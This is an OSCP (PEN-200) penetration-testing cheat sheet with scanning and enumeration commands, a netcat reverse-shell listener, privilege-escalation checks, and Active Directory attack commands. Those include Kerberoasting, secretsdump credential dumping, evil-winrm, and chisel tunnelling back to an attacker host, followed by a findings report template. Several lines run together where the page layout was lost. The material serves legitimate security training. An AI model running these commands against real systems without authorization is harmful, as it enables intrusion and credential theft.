OSCP (PEN-200) focuses on practical penetration testing across standalone and Active Directory environments, emphasizing enumeration depth, exploitation workflow, privilege escalation, lateral movement, and professional reporting.
Official Pagenmap -sn 10.10.10.0/24
rustscan -a TARGET -- -sC -sV
nmap -p- --min-rate 1500 -T4 -oN allports.txt TARGET
ports=$(grep -oP '\d+/(?=open)' allports.txt | paste -sd, -)
nmap -sC -sV -p$ports -oN svc.txt TARGETwhatweb http://TARGET
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak
ffuf -u http://TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://TARGET -H 'Host: FUZZ.target.local' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txtsmbclient -L //TARGET -N
enum4linux-ng -A TARGET
rpcclient -U "" -N TARGET
nxc smb TARGET -u user -p pass --shares
ldapsearch -x -H ldap://TARGET -s base namingcontextsrlwrap -cAr nc -lvnp 4444
python3 -c "import pty; pty.spawn('/bin/bash')"
export TERM=xterm
stty rows 50 cols 160sudo -l
id && uname -a
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
./linpeas.shwhoami /priv
winPEASx64.exe
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP -format hashcat
secretsdump.py domain/user:pass@DC_IP
evil-winrm -i TARGET -u user -p pass# attacker
./chisel server -p 8000 --reverse
# victim
chisel.exe client ATTACKER:8000 R:socksTitle:
Severity:
Affected Host(s):
Description:
Impact:
Evidence (commands/screenshots):
Reproduction Steps:
1)
2)
3)
Remediation:
Verification: